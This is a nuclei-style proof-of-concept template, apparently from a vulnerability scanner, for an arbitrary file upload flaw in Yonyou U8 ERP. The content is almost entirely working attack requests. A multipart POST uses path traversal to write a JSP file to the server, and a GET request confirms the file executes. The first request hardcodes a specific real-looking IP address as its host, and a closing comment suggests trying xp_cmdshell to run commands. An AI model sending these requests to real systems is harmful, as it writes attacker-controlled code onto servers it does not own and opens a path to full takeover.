dddd/common/config/pocs/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml

id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload

info:
  name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
  author: SleepingBag945
  severity: critical
  description: 用友U8+ERP客户关系管理软件存在文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
  tags: yonyou,upload

http:
  - raw:
      - |
        POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
        Host: 60.172.58.9:8010
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Content-Length: 327
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
        Accept-Encoding: gzip

        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp"
        Content-Type: application/octet-stream

        <% {out.print("{{randstr_2}}");} %>
        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="submit"

        submit
        ------WebKitFormBoundaryqoqnjtcw--

      - |
        GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip


    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and


# 可尝试启动并调用xpcmdshell执行命令